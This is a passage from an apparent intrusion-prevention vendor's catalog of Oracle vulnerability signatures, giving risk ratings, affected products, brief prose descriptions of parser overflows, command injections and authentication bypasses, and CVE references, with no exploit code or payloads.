https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21932

Oracle-Oss-Support-Tools-Diagnostic-Assistant-External-Entity-Injection

About this vulnerability:

A vulnerability in Oracle OSS Support Tools

Risk:

Moderate

First detected in:

sgpkg-ips-1391-5242

Last changed:

sgpkg-ips-1391-5242

Platform:

Generic

Software:

Oracle OSS Support Tools

Type:

Input Validation

Description:

Improper parsing of input parameters causes an external entity injection vulnerability in Oracle OSS Support Tools. A successful exploit allows an attacker to gain access to arbitrary files accessible to the target application.

Situation:

HTTP_CSU-Oracle-Oss-Support-Tools-Diagnostic-Assistant-External-Entity-Injection

References:

CVE-2021-2303
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2303

Oracle-Outside-In-Coreldraw-File-Parser-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Outside In Technology

Risk:

Moderate

First detected in:

sgpkg-ips-509-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Outside In Technology

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability is due to an error while processing CorelDRAW files. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable libraries to handle a malformed files. Depending on the application, user interaction may be required. Successful exploitation can result in execution of arbitrary code or a denial of service condition in the context of the affected application.

Situation:

File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Heap-Buffer-Overflow

References:

CVE-2013-0418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0418

BID-57364
http://www.securityfocus.com/bid/57364

MS13-012
http://technet.microsoft.com/security/bulletin/MS13-012

Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow

About this vulnerability:

A vulnerability in Oracle Outside In Technology

Risk:

Moderate

First detected in:

sgpkg-ips-416-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Outside In Technology

Type:

Buffer Overflow

Description:

Ther is an integer overflow vulnerability that leads to a heap buffer overflow in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability occurs when handling CorelDRAW (.cdr) files. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to handle a malformed .cdr file. Depending on the application, user interaction may be required. Successful exploitation can result in arbitrary code execution in the context of the affected application.

Situation:

File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow

References:

CVE-2011-2264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2264

OSVDB-73912
http://www.osvdb.org/73912

Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow-2

About this vulnerability:

A vulnerability in Oracle Outside In Technology

Risk:

Moderate

First detected in:

sgpkg-ips-420-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Outside In Technology; Avantstar Quick View Plus

Type:

Buffer Overflow

Description:

There is an integer overflow vulnerability that leads to a heap buffer overflow in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability can be exploited by using crafted CorelDRAW (.cdr) files. Oracle Outside-In is used by many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to process a malformed .cdr file. Depending on the application, user interaction may be required. Successful exploitation can result in arbitrary code execution in the context of the affected application.

Situation:

File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Integer-Overflow-2

References:

CVE-2011-3541
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3541

BID-50207
http://www.securityfocus.com/bid/50207

Oracle-Outside-In-Coreldraw-File-Parser-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Outside In Technology

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Outside In Technology

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability exists when handling CorelDRAW (.cdr) files. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to handle a malformed .cdr file. Depending on the application, user interaction may be required. Successful exploitation can result in arbitrary code execution in the context of the affected application.

Situation:

HTTP_SS-Oracle-Outside-In-Coreldraw-File-Parser-Stack-Buffer-Overflow
File-RIFF_Oracle-Outside-In-Coreldraw-File-Parser-Stack-Buffer-Overflow

References:

CVE-2011-2264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2264

OSVDB-73912
http://www.osvdb.org/73912

Oracle-Outside-In-Excel-Gelframe-Officeartreclen-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Oracle Outside In Technology

Risk:

Moderate

First detected in:

sgpkg-ips-1118-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Outside In Technology

Type:

Input Validation

Description:

Improper handling of records in an OLE file causes an out of bounds read vulnerability in Oracle Outside In. A successful exploit can be used to gain information about the target system which can be used for further exploitation.

Situation:

File-OLE_Oracle-Outside-In-Excel-Gelframe-Officeartreclen-Out-Of-Bounds-Read

References:

CVE-2018-3147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3147

Oracle-Outside-In-Excel-Gelframe-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Oracle Outside In Technology

Risk:

Moderate

First detected in:

sgpkg-ips-1093-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Outside In Technology

Type:

Integer Overflow

Description:

Improper handling of a GelFrame record of an Excel document causes an out of bounds read vulnerability in the Oracle Outside-In library. A successful exploit may allow an attacker to leak data from the target system.

Situation:

File-OLE_Oracle-Outside-In-Excel-Gelframe-Out-Of-Bounds-Read

References:

CVE-2018-2992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2992

Oracle-Outside-In-Excel-Propertysetstream-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Oracle Outside In Technology

Risk:

Moderate

First detected in:

sgpkg-ips-1104-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Outside In Technology

Type:

Malfunction

Description:

Improper parsing of file contents causes an out of bounds write vulnerability in the Orace Outside in library. A successful exploit may allow an attacker to run code on the target system.

Situation:

File-OLE_Oracle-Outside-In-Excel-Propertysetstream-Out-Of-Bounds-Write

References:

CVE-2018-3010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3010

Oracle-Outside-In-JPEG-2000-Cod-And-Coc-Parameter-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Outside In Technology

Risk:

Moderate

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Outside In Technology

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Oracle Outside In, a set of libraries used to decode many file formats. The vulnerability is exposed when the product is used to handle JPEG 2000 files. Oracle Outside In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to handle a malformed JPEG 2000 file. Depending on the application, user interaction may be required. Successful exploitation can result in arbitrary code execution in the context of the affected application.

Situation:

File-JPEG_Oracle-Outside-In-JPEG-2000-Cod-And-Coc-Parameter-Heap-Buffer-Overflow

References:

CVE-2011-4516
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4516

BID-50992
http://www.securityfocus.com/bid/50992

OSVDB-77595
http://www.osvdb.org/77595

Oracle-Outside-In-JPEG-2000-Qcd-Segment-Processing-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Outside In Technology

Risk:

High

First detected in:

sgpkg-ips-466-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Outside In Technology

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability exists when handling the QCD segments in JPEG 2000 files. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to handle a malformed JPEG 2000 file. Depending on the application, user interaction may be required. Successful exploitation can result in arbitrary code execution in the context of the affected application.

Situation:

File-JPEG_Oracle-Outside-In-JPEG-2000-Qcd-Segment-Processing-Heap-BOF

References:

CVE-2012-1769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1769

BID-54500
http://www.securityfocus.com/bid/54500

MS12-067
http://technet.microsoft.com/security/bulletin/MS12-067

Oracle-Outside-In-Lotus-1-2-3-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Outside In Technology

Risk:

Moderate

First detected in:

sgpkg-ips-439-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Outside In Technology; Avantstar Quick View Plus

Type:

Buffer Overflow

Description:

There is a code execution vulnerability in Oracle's Outside In SDK. The vulnerability is due to improper parsing of SRANGE records (type 0x001B) in Lotus 1-2-3 files. A remote, unauthenticated attacker can leverage this vulnerability by delivering a crafted Lotus 1-2-3 file to a vulnerable target. A successful attack could result in the execution of arbitrary code in the security context of the affected application.

Situation:

File-Binary_Oracle-Outside-In-Lotus-1-2-3-Heap-Buffer-Overflow

References:

CVE-2012-0110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0110

BID-51452
http://www.securityfocus.com/bid/51452

OSVDB-78411
http://www.osvdb.org/78411

Oracle-Outside-In-OS2-Metafile-Parser-Denial-Of-Service

About this vulnerability:	A vulnerability in Oracle Outside In Technology
Risk:	Moderate
First detected in:	sgpkg-ips-548-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Outside In Technology
Type:	Infinite Loop
Description:	There is a denial of service vulnerability in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability is due to an error while processing OS/2 Metafiles. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable libraries to handle a malformed file. Depending on the application, user interaction may be required. Successful exploitation can result in a denial of service condition of the affected application.
Situation:	File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Denial-Of-Service

Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Outside In Technology

Risk:

Moderate

First detected in:

sgpkg-ips-549-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Outside In Technology

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability is due to a boundary error while processing OS/2 Metafiles. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable libraries to handle a malformed files. Depending on the application, user interaction may be required. Successful exploitation can result in execution of arbitrary code or a denial of service condition in the context of the affected application.

Situation:

File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow

References:

CVE-2013-5763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5763

OSVDB-98894
http://www.osvdb.org/98894

MS13-105
http://technet.microsoft.com/security/bulletin/MS13-105

Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow-2

About this vulnerability:

A vulnerability in Oracle Outside In Technology

Risk:

Moderate

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Outside In Technology

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability is due to an error while processing OS/2 Metafiles. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable libraries to handle a malformed file. Depending on the application, user interaction may be required. Successful exploitation can result in execution of arbitrary code or a denial of service condition in the context of the affected application.

Situation:

File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Stack-Buffer-Overflow-2

References:

CVE-2013-5879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5879

BID-64825
http://www.securityfocus.com/bid/64825

OSVDB-102030
http://www.osvdb.org/102030

Oracle-Outside-In-OS22-Metafile-Parser-Heap-Buffer-Overflow

About this vulnerability:	A vulnerability in Oracle Outside In Technology
Risk:	Moderate
First detected in:	sgpkg-ips-549-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Outside In Technology
Type:	Buffer Overflow
Description:	There is a heap buffer overflow vulnerability in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability is due to an error while processing OS/2 Metafiles. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to handle a malformed file. Depending on the application, user interaction may be required. Successful exploitation can result in execution of arbitrary code or a denial of service condition in the context of the affected application.
Situation:	File-Binary_Oracle-Outside-In-OS2-Metafile-Parser-Heap-Buffer-Overflow

Oracle-Outside-In-Paradox-Database-Stream-Filter-Denial-Of-Service

About this vulnerability:

A vulnerability in Oracle Outside In Technology

Risk:

Moderate

First detected in:

sgpkg-ips-507-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Outside In Technology

Type:

Input Validation

Description:

There is a denial of service vulnerability in Oracle Outside In, a set of libraries used to decode many file formats. The vulnerability is due to an error while processing Paradox databases that contain a malicious entry in a field description array. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to handle a malformed Paradox database. Depending on the application, user interaction may be required. Successful exploitation can result in a denial of service condition in the context of the affected application.

Situation:

File-Binary_Oracle-Outside-In-Paradox-Database-Stream-Filter-Denial-Of-Service

References:

CVE-2013-0393
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0393

BID-57357
http://www.securityfocus.com/bid/57357

OSVDB-89193
http://www.osvdb.org/89193

MS13-012
http://technet.microsoft.com/security/bulletin/MS13-012

Oracle-Outside-In-XPM-Image-Processing-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Oracle Outside In Technology
Risk:	Moderate
First detected in:	sgpkg-ips-471-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Outside In Technology
Type:	Buffer Overflow
Description:	There is a stack buffer overflow vulnerability in Oracle Outside-In, a set of libraries used to decode many file formats. The vulnerability exists when handling XPM image files. Oracle Outside-In is embedded in many enterprise applications. This vulnerability can be exploited by causing an application that uses the vulnerable library to handle a malformed XPM file. Depending on the application, user interaction may be required. Successful exploitation can result in arbitrary code execution in the context of the affected application.
Situation:	File-TextId_Oracle-Outside-In-XPM-Image-Processing-Stack-Buffer-Overflow

Oracle-Reports-Service-File-Overwrite

About this vulnerability:

File overwrite vulnerability in the Oracle Reports Service

Risk:

High

First detected in:

sgpkg-ips-55-1210

Last changed:

sgpkg-ips-1396-5242

Platform:

Generic

Software:

Oracle Application Server; Oracle Developer Suite

Type:

Input Validation

Description:

The Oracle Reports Service component in Oracle Application Server has a file overwrite vulnerability. The application fails to validate the value of the 'desname' CGI parameter which can be used to configure where the generated report is stored. A remote attacker is able to exploit this vulnerability to overwrite arbitrary files on the target server.

Situation:

HTTP_CSU-Oracle-Reports-Service-File-Overwrite

References:

CVE-2005-2371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2371

BID-14309
http://www.securityfocus.com/bid/14309

Oracle-Secure-Backup-Administration-Other-Variable-Command-Injection

About this vulnerability:

Command injection vulnerability in Oracle Secure Backup server

Risk:

High

First detected in:

sgpkg-ips-326-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Oracle Secure Backup

Type:

Code Injection

Description:

There is a command injection vulnerability in Oracle Secure Backup server. The vulnerability is due to an input validation error in property_box.php. A remote authenticated attacker can compromise the vulnerable system by sending a crafted HTTP request to the affected script.

Situation:

HTTP_CRL-Oracle-Secure-Backup-Administration-Other-Variable-Command-Injection

References:

CVE-2010-0899
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0899

BID-41616
http://www.securityfocus.com/bid/41616

OSVDB-66333
http://www.osvdb.org/66333

Oracle-Secure-Backup-Administration-Preauth-Variable-Command-Injection

About this vulnerability:

A vulnerability in Oracle Secure Backup

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Secure Backup

Type:

Input Validation

Description:

A command execution vulnerability exists in Oracle Secure Backup server. The vulnerability is due to insufficient filtering when handling the $preauth variable. A remote authenticated attacker could exploit this vulnerability by sending a specially crafted HTTP request to the index.php script on the target server. Successful exploitation of this vulnerability may allow a remote authenticated attacker to execute arbitrary commands under the credentials of the SYSTEM account.

Situation:

HTTP_CSU-Oracle-Secure-Backup-Administration-Preauth-Variable-Command-Injection

References:

CVE-2010-0906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0906

BID-41597
http://www.securityfocus.com/bid/41597

Oracle-Secure-Backup-Administration-selector-Variable-Command-Injection

About this vulnerability:

A command execution vulnerability in Oracle Secure Backup server

Risk:

High

First detected in:

sgpkg-ips-367-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Oracle Secure Backup

Type:

Malfunction

Description:

There is a command execution vulnerability in Oracle Secure Backup server. A remote authenticated attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server to execute arbitrary commands with SYSTEM privileges.

Situation:

HTTP_CRL-Oracle-Secure-Backup-Administration-selector-Variable-Command-Injection

References:

CVE-2010-0906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0906

BID-41597
http://www.securityfocus.com/bid/41597

OSVDB-67128
http://www.osvdb.org/67128

Oracle-Secure-Backup-Administration-Server-Authentication-Bypass

About this vulnerability:

An authentication bypass vulnerability in Oracle Secure Backup server

Risk:

Moderate

First detected in:

sgpkg-ips-325-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Oracle Secure Backup

Type:

Malfunction

Description:

There is an authentication bypass vulnerability in Oracle Secure Backup server. By sending a crafted uname variable to the login.php script, a remote attacker can bypass authentication and log in to the vulnerable system with the full administrative capabilities.

Situation:

HTTP_CRL-Oracle-Secure-Backup-Administration-Server-Authentication-Bypass

References:

CVE-2010-0904
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0904

BID-41596
http://www.securityfocus.com/bid/41596

Oracle-Secure-Backup-Administration-Server-Command-Injection

About this vulnerability:

Command injection vulnerability in Oracle Secure Backup server

Risk:

High

First detected in:

sgpkg-ips-240-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Oracle Secure Backup

Type:

Code Injection

Description:

A command injection vulnerability exists in Oracle Secure Backup server. The vulnerability is due to an input validation error in property_box.php. A remote attacker with limited user privileges can compromise the vulnerable system by sending a crafted HTTP request to the affected script.

Situation:

HTTP_CRL-Oracle-Secure-Backup-Administration-Server-Command-Injection
HTTPS_CS-Oracle-Secure-Backup-Administration-Server-Command-Injection

References:

CVE-2009-1978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1978

BID-35678
http://www.securityfocus.com/bid/35678

OSVDB-55904
http://www.osvdb.org/55904

Oracle-Secure-Backup-Administration-Validate_Login-Command-Injection

About this vulnerability:

A vulnerability in Oracle Secure Backup

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Secure Backup

Type:

Input Validation

Description:

A command injection vulnerability exists in Oracle Secure Backup Administration server. The vulnerability is due to insufficient filtering of user supplied data to the login.php script used in the administration server. Remote unauthenticated attackers can exploit this vulnerability by sending a crafted HTTP request to the target host. Successful exploitation would allow for arbitrary command execution in the security context of the user running the web server of Oracle Secure Backup. The behaviour of the target is entirely dependent on the intended function of the injected command.

Situation:

HTTP_CSU-Oracle-Secure-Backup-Administration-Validate_Login-Command-Injection

References:

CVE-2011-2261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2261

BID-48752
http://www.securityfocus.com/bid/48752

Oracle-Secure-Backup-Command-Injection

About this vulnerability:

An Oracle Secure Backup Command Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-788-5211

Last changed:

sgpkg-ips-1739-5242

Platform:

Generic

Software:

Oracle Secure Backup

Type:

Malfunction

Description:

A vulnerability in Oracle Secure Backup, version 10.2.0.2, which allows remote attackers to execute arbitrary code due to the improper sanitization of the variable rbtool.

Situation:

HTTP_CRL-Oracle-Secure-Backup-Remote-Command-Execution

References:

CVE-2008-5448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5448

BID-33177
http://www.securityfocus.com/bid/33177

Oracle-Secure-Backup-Exec_qr-Command-Injection

About this vulnerability:

Oracle login.php argument command injection

Risk:

High

First detected in:

sgpkg-ips-200-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Secure Backup

Type:

Code Injection

Description:

There exists a command injection vulnerability in Oracle Secure Backup. The vulnerability is due to lack of sanitation of user supplied parameters when processing HTTP requests sent to PHP program login.php. Remote unauthenticated attackers can exploit this vulnerability by sending a crafted HTTP request to the target host. Successful exploitation would allow for arbitrary command execution in the security context of the user running the web server of Oracle Secure Backup. The behaviour of the target is entirely dependent on the intended function of the injected command.

Situation:

HTTP_CRL-Oracle-Secure-Backup-Remote-Command-Execution

References:

CVE-2008-5448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5448

BID-33177
http://www.securityfocus.com/bid/33177

Oracle-Secure-Backup-NDMP-Connect-Username-BOF

About this vulnerability:

Oracle Secure Backup Username Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-203-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Secure Backup

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Oracle Secure Backup. The flaw is due to insufficient boundary checking when processing NDMP requests sent to program obndmpd.exe. Remote unauthenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code execution with System level privileges. In an attack case where code injection is not successful, the affected process will terminate abnormally. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process, with System level privileges.

Situation:

Generic_Oracle-Secure-Backup-NDMP-Username-BOF

References:

CVE-2008-5444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5444

BID-33177
http://www.securityfocus.com/bid/33177

Oracle-Secure-Backup-NDMP-Packet-Handling-Multiple-Denial-Of-Service

About this vulnerability:

A vulnerability in Oracle Secure Backup

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Secure Backup

Type:

Malfunction

Description:

Multiple denial of service vulnerabilities exist in Oracle Secure Backup.

Situation:

Generic_CS-Oracle-Secure-Backup-NDMP-Packet-Handling-Multiple-Denial-Of-Service

References:

CVE-2008-5441
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5441

BID-33177
http://www.securityfocus.com/bid/33177

Oracle-Secure-Backup-Objectname-Variable-Command-Injection

About this vulnerability:

A vulnerability in Oracle Secure Backup

Risk:

High

First detected in:

sgpkg-ips-381-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Secure Backup

Type:

Input Validation

Description:

A command execution vulnerability exists in Oracle Secure Backup server. The vulnerability is due to an input validation error when property_box.php script handles the $objectname Variable. A remote authenticated attacker could exploit this vulnerability by sending a specially crafted HTTP request to the target. Successful exploitation of this vulnerability may allow a remote authenticated attacker to execute arbitrary commands under the credentials of the SYSTEM account.

Situation:

HTTP_CSU-Oracle-Secure-Backup-Objectname-Variable-Command-Injection

References:

CVE-2010-0906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0906

BID-41597
http://www.securityfocus.com/bid/41597

Oracle-Secure-Backup-observiced.exe-Buffer-Overflow

About this vulnerability:

An Oracle Secure Backup observiced.exe Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-1008-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Secure Backup

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Oracle Secure Backup which allows remote attackers to execute arbitrary code by sending carefully crafted requests to the affected service, due to a boundary error on the daemon observiced.exe.

Situation:

Generic_Oracle-Secure-Backup-observiced.exe-Buffer-Overflow-2
DNS-UDP_Oracle-Secure-Backup-observiced.exe-Buffer-Overflow

References:

CVE-2010-0072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0072

Oracle-Secure-Backup-Server-Authentication-Bypass

About this vulnerability:

Oracle Secure Backup Server authentication bypass

Risk:

High

First detected in:

sgpkg-ips-239-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Secure Backup

Type:

Malfunction

Description:

An authentication bypass vulnerability exists in Oracle Secure Backup server. The vulnerability is due to a flaw in the logic used to authenticate a user to the administration server. The script 'common.php' does not properly sanitize the user name variable before using it in a database query. Successful exploitation of this vulnerability allows remote attackers to bypass authentication on vulnerable installations of Oracle Secure Backup by sending a specially crafted user name variable. This would allow the attacker to log in to the vulnerable system with full administrative capabilities.

Situation:

HTTP_CRL-Oracle-Secure-Backup-Authentication-Bypass

References:

CVE-2009-1977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1977

BID-35672
http://www.securityfocus.com/bid/35672

OSVDB-55903
http://www.osvdb.org/55903

Oracle-Secure-Backup-Server-Login-Command-Injection

About this vulnerability:

Oracle Secure Backup Server login command injection

Risk:

High

First detected in:

sgpkg-ips-203-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Secure Backup

Type:

Code Injection

Description:

There exists a command injection vulnerability in Oracle Secure Backup. The vulnerability is due to lack of sanitation of user supplied parameters when processing HTTP requests sent to CGI program login.php. Remote unauthenticated attackers can exploit this vulnerability by sending a crafted HTTP request to the target host. Successful exploitation would allow for arbitrary command execution in the security context of the user running the web server of Oracle Secure Backup. The behaviour of the target is entirely dependent on the intended function of the injected command.

Situation:

HTTP_CRL-Oracle-Secure-Backup-Remote-Command-Injection

References:

CVE-2008-5449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5449

BID-33177
http://www.securityfocus.com/bid/33177

Oracle-Secure-Backup-Server-Login-Cookies-Command-Injection

About this vulnerability:

Oracle Secure Backup Server login cookies command injection

Risk:

High

First detected in:

sgpkg-ips-203-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Secure Backup

Type:

Code Injection

Description:

There exists a command injection vulnerability in Oracle Secure Backup. The vulnerability is due to lack of sanitation of user supplied parameters when processing HTTP requests sent to CGI program login.php. Remote unauthenticated attackers can exploit this vulnerability by sending a crafted HTTP request to the target host. Successful exploitation would allow for arbitrary command execution in the security context of the user running the web server of Oracle Secure Backup. The behaviour of the target is entirely dependent on the intended function of the injected command.

Situation:

HTTP_CRL-Oracle-Secure-Backup-Remote-Cookies-Command-Injection
HTTPS_CS-Oracle-Secure-Backup-Remote-Cookies-Command-Injection

References:

CVE-2008-4006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4006

BID-33177
http://www.securityfocus.com/bid/33177

Oracle-Secure-Enterprise-Search-Parameter-Cross-Site-Scripting

About this vulnerability:

A cross site scripting vulnerability in Oracle Secure Enterprise Search

Risk:

Moderate

First detected in:

sgpkg-ips-234-3038

Last changed:

sgpkg-ips-1396-5242

Platform:

Generic

Software:

Oracle Secure Enterprise Search

Type:

Input Validation

Description:

There is a cross-site scripting vulnerability in Oracle Secure Enterprise Search. The vulnerability is due to insufficient input validation of the "search_p_groups" parameter. A remote attacker can exploit this flaw by enticing the target user to open a link to a malicious URL. Successful exploitation results in the compromise of web browser cookies (including authentication cookies) associated with the site, and modification of user information.

Situation:

HTTP_CSU-Oracle-Secure-Enterprise-Search-Parameter-Cross-Site-Scripting

References:

CVE-2009-1968
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1968

BID-35681
http://www.securityfocus.com/bid/35681

OSVDB-55892
http://www.osvdb.org/55892

Oracle-Single-Sign-On-Vulnerability

About this vulnerability:	An Oracle Single-Sign-On vulnerability
Risk:	High
First detected in:	sgpkg-ips-1000-5242
Last changed:	sgpkg-ips-1453-5242
Platform:	Generic
Software:	Oracle 9i
Type:	Malfunction
Description:	A vulnerability in the Single Sign On component within Oracle Application Server which allows remote attackers to gather user information and gain access to the Oracle Enterprise system due to an issue with the way custom scripts are used in the login of Oracle Single Sign On.
Situation:	HTTP_CRL-Oracle-Single-Sign-On-Vulnerability

Oracle-Solaris-RPC-CVE-2017-3623-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Solaris

Risk:

Moderate

First detected in:

sgpkg-ips-974-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris

Software:

<os>

Type:

Buffer Overflow

Description:

Improper parsing of RPC requests causes a heap buffer overflow in Oracle Solaris. A successful exploit allows an attacker to run arbitrary code with root privileges on the targets system without authentication.

Situation:

Generic_CS-Oracle-Solaris-RPC-CVE-2017-3623-Heap-Buffer-Overflow

References:

CVE-2017-3623
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3623

Oracle-SQL-Injection-Database-Compromise

About this vulnerability:

Unauthorized database modification

Risk:

High

First detected in:

sgpkg-ips-83-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database

Type:

SQL Injection

Description:

